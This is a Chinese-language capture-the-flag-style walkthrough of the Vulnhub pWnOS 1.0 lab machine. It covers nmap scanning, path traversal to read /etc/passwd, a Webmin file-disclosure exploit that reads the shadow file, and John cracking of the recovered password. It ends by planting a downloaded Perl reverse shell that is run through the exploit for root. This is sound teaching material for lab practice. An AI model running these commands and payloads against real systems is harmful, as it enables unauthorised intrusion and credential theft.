Vulnhub靶机实操笔记-pWnOS1.0-解法一

admin
admin
admin
139598
文章
114
评论
2023年8月2日09:04:20评论35 views字数 1732阅读5分46秒阅读模式

一、Namp扫描

1、主机存活判断

sudo nmap -sn 10.10.10.0/24

Vulnhub靶机实操笔记-pWnOS1.0-解法一

2、快速扫描

以不低于1w的速度快速扫描端口

sudo nmap --min-rate 10000 -p- 10.10.10.23

--min-rate          #以不低于xxx的速度扫描
-p-                 #全端口

Vulnhub靶机实操笔记-pWnOS1.0-解法一

使用TCP和UDP的形式对扫出的端口进行协议的查看

3、TCP扫描

sudo nmap -sT -sV -O -p22,80,139,44,5,10000  10.10.10.23

-sT               #以TCP协议进行扫描
-sV               #服务的版本号
-O                #服务器系统
-p                #指定端口

Vulnhub靶机实操笔记-pWnOS1.0-解法一

4、UDP扫描

sudo nmap -sU -p22,80,139,44,5,10000  10.10.10.23

-sU           #以UDP协议扫描
-p            #指定端口
-oA           #将扫描结果输出保存到某个文件夹下某个文件 例子是放在report目录下叫heavy-U文件

Vulnhub靶机实操笔记-pWnOS1.0-解法一

5、Namp的POC扫描

sudo nmap --script=vuln -p22,80,139,445,10000  10.10.10.23

Vulnhub靶机实操笔记-pWnOS1.0-解法一

Vulnhub靶机实操笔记-pWnOS1.0-解法一

二、访问web网页

访问80端口

Vulnhub靶机实操笔记-pWnOS1.0-解法一

Vulnhub靶机实操笔记-pWnOS1.0-解法一

尝试输入单引号看看返回结果如何,发现会报错出路径

Vulnhub靶机实操笔记-pWnOS1.0-解法一

直接尝试文件包含,我直呼好家伙

http://10.10.10.23/index1.php?help=true&connect=../../../../../etc/passwd

Vulnhub靶机实操笔记-pWnOS1.0-解法一

三、Webmin EXP

通过前面namp扫描结果,尝试使用EXP进行攻击·,这边提示的是文件泄漏漏洞

Vulnhub靶机实操笔记-pWnOS1.0-解法一

Vulnhub靶机实操笔记-pWnOS1.0-解法一

kali搜索EXP

searchsploit webmin

Vulnhub靶机实操笔记-pWnOS1.0-解法一

searchsploit webmin -m 2017.pl

Vulnhub靶机实操笔记-pWnOS1.0-解法一

查看exp的利用示例

sudo perl 2017.pl

Vulnhub靶机实操笔记-pWnOS1.0-解法一

漏洞利用

sudo perl 2017.pl 10.10.10.25 10000 /etc/passwd 0  #输入0是因为我们是http服务

查看shadow

Vulnhub靶机实操笔记-pWnOS1.0-解法一

四、John解密

解密出的用户密码vmware/h4ckm3

sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt

Vulnhub靶机实操笔记-pWnOS1.0-解法一

五、登陆SSH

1、ssh登陆小插曲

直接连接ssh,发现登录ssh需要指定类型

Vulnhub靶机实操笔记-pWnOS1.0-解法一
2、添加ssh连接类型

sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss [email protected]

Vulnhub靶机实操笔记-pWnOS1.0-解法一

六、内网提权

1、查看系统详情

uname -a

Vulnhub靶机实操笔记-pWnOS1.0-解法一

2、查看用户权限

sudo -l

Vulnhub靶机实操笔记-pWnOS1.0-解法一

3、查看定时任务

cat /etc/crontab

Vulnhub靶机实操笔记-pWnOS1.0-解法一

4、shadow细节反思

首先明确一点,能获得shadow一定是有系统权限或其他特殊权限。其次,我们是从webmin漏洞获得的shadow,并通过shadow去解密获得了一个账户密码拿到了一个初始shell。此时,应该考虑继续利用在webmin上面大权限的方面。在这种用户系统权限下构造反弹一个shell,再用webmin去文件包含调用它从而完成提权。

cd /var
ls -liah

Vulnhub靶机实操笔记-pWnOS1.0-解法一

5、攻击机构造shell.cgi

攻击机kali复制系统perl的shell.pl文件重新命令为shell.cgi

cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi

Vulnhub靶机实操笔记-pWnOS1.0-解法一

修改shell.cgi需要反弹的ip地址与端口

Vulnhub靶机实操笔记-pWnOS1.0-解法一

6、php 开启http

php 开启一个本地http server

php -S 0.0.0.0:8080         #本地开启http服务架设在80端口

sudo php -S 0:80            #简写版 开启http服务架设在80端口

Vulnhub靶机实操笔记-pWnOS1.0-解法一

受控机器远程下载shell.cgi,给shell.cgi文件执行权限

cd /home/vmware          #vmware当前系统用户名
wget http://10.10.10.20:8000/shell.cgi
ls -laih

Vulnhub靶机实操笔记-pWnOS1.0-解法一

7、获得root权限

继续使用webmin文件包含漏洞exp

sudo perl 2017.pl 10.10.10.23 10000 /home/vmware/shell.cgi 0

Vulnhub靶机实操笔记-pWnOS1.0-解法一

成功反弹获得shell

Vulnhub靶机实操笔记-pWnOS1.0-解法一

七、靶场下载链接

https://download.vulnhub.com/pwnos/pWnOS_v1.0.zip

原文始发于微信公众号(黄公子学安全):Vulnhub靶机实操笔记-pWnOS1.0-解法一

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月2日09:04:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub靶机实操笔记-pWnOS1.0-解法一http://cn-sec.com/archives/1927642.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息